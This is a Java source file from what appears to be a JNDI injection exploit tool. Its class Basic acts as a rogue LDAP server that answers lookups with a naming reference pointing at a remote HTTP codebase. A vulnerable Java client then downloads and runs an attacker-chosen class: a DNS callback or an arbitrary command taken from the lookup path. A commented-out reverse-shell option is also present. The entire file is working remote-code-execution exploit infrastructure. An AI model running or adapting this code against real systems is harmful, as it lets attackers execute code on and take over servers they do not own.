-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathBasic.java
105 lines (93 loc) · 4.14 KB
/
Basic.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
package net.roboterh.injector.gadgets;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import net.roboterh.injector.enums.PayloadEnum;
import net.roboterh.injector.servers.HTTPServer;
import net.roboterh.injector.templates.CommandTemplate;
import net.roboterh.injector.templates.DnsLogTemplate;
import net.roboterh.injector.utils.PayloadUtils;
import org.apache.log4j.LogManager;
import org.apache.log4j.Logger;
import java.net.URL;
/*
Basic way
Requirement:
com.sun.jndi.ldap.object.trustURLCodebase = true
Explanation:
set attribution `javaCodeBase` to remote server, and we can obtain particular class
*/
public class Basic implements LDAPService {
private static final Logger logger = LogManager.getLogger(Basic.class);
private String[] params;
private PayloadEnum payload;
private String className;
public void sendResult(InMemoryInterceptedSearchResult result, String baseDN) {
argsHandler(baseDN);
generateHandler();
try {
Entry entry = new Entry(baseDN);
URL url = new URL(new URL(HTTPServer.codeBase), className + ".class");
logger.info(String.format("Send LDAP reference result for %s redirecting to %s ...", baseDN, url));
entry.addAttribute("javaClassName", "foo");
entry.addAttribute("javaCodeBase", HTTPServer.codeBase);
entry.addAttribute("javaFactory", className);
entry.addAttribute("objectClass", "javaNamingReference");
result.sendSearchEntry(entry);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
} catch (Exception e) {
logger.info(e.getMessage());
}
}
public void argsHandler(String baseDN) {
for (PayloadEnum payloadEnum : PayloadEnum.values()) {
if (baseDN.toLowerCase().contains(payloadEnum.name().toLowerCase())) {
payload = payloadEnum;
logger.info(String.format("Payload Selected is %s ...", payload.name()));
// add args
switch (payload.name()) {
case "DnsLog":
// add dnslog's link
String link = baseDN.substring(baseDN.lastIndexOf("/") + 1);
logger.info(String.format("Received link is %s ...", link));
params = new String[]{link};
break;
case "Command":
// add command's cmd
String cmd = PayloadUtils.getCmdFromBase(baseDN);
logger.info(String.format("Received command is %s ...", cmd));
params = new String[]{cmd};
break;
// case "ReverseShell":
// // add ip and port of remote machine
// int lastIndex = baseDN.lastIndexOf("/");
// int secondIndex = baseDN.lastIndexOf("/", lastIndex - 1);
// String ip = baseDN.substring(secondIndex + 1, lastIndex);
// String port = baseDN.substring(lastIndex + 1);
// logger.info(String.format("Received ip is %s and port is %s ...", ip, port));
// params = new String[]{ip, port};
// break;
}
}
}
}
public void generateHandler() {
switch (payload.name()) {
case "DnsLog":
DnsLogTemplate dnsLogTemplate = new DnsLogTemplate(params[0]);
// add Cache
dnsLogTemplate.addCache();
className = dnsLogTemplate.getClassName();
break;
case "Command":
CommandTemplate commandTemplate = new CommandTemplate(params[0]);
// add cache
commandTemplate.addCache();
className = commandTemplate.getClassName();
break;
default:
className = "";
}
}
}